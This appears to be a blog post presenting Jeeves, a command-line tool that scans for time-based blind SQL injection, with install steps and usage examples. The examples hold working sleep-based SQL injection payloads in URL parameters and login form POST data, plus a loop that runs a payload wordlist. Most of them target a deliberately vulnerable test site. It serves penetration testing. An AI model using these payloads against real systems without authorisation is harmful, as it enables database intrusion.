Kali Linux

Jeeves : Time-Based Blind SQLInjection Finder

Jeeves is made for looking to Time-Based Blind SQLInjection through recon.

Installation & Requirements

Installing Jeeves 

$ go install github.com/ferreiraklet/Jeeves@latest

OR

$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

Usage & Explanation

Single urls

echo ‘https://redacted.com/index.php?id=your_time_based_blind_payload_here’ | jeeves -t payload_time
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(10)))v)” | jeeves -t 10

In –payload-time you must use the time mentioned in payload

From list

cat targets | jeeves --payload-time 5

Adding Headers

Pay attention to the syntax! Must be the same =>

echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -H “Testing: testing;OtherHeader: Value;Other2: Value”

Using proxy

echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 –proxy “http://ip:port”
echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves -t 5 -p “http://ip:port”

Proxy + Headers =>

echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5 –proxy “http://ip:port” -H “User-Agent: xxxx”

Post Request

Sending data through post request ( login forms, etc )

Pay attention to the syntax! Must be equal! ->

echo “https://example.com/Login.aspx” | jeeves -t 10 -d “user=(select(0)from(select(sleep(5)))v)&password=xxx”
echo “https://example.com/Login.aspx” | jeeves -t 10 -H “Header1: Value1” -d “username=admin&password=’+(select*from(select(sleep(5)))a)+'” -p “http://yourproxy:port”

Another ways of Usage

You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght

Command line flags

Usage:
-t, –payload-time, The time from payload
-p, –proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, –headers Custom Headers
-d, –data Sending Post request with data
-h Show This Help Message

Using with sql payloads wordlist

cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

R K

Recent Posts

Website OSINT: Tools and Techniques for Reconnaissance

Introduction When it comes to cybersecurity and ethical hacking, one of the most effective ways…

12 hours ago

Top OSINT Tools to Find Emails, Usernames and Passwords

Introduction In the world of cybersecurity, knowledge is power. One of the most powerful skillsets…

1 day ago

Google Dorking in Cybersecurity: A Complete Guide

Introduction In the vast ocean of the internet, the most powerful tool you already have…

2 days ago

Pystinger : Bypass Firewall For Traffic Forwarding Using Webshell

Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…

2 weeks ago

CVE-Search : A Tool To Perform Local Searches For Known Vulnerabilities

Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…

2 weeks ago

CVE-Search : A Tool To Perform Local Searches For Known Vulnerabilities

Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…

2 weeks ago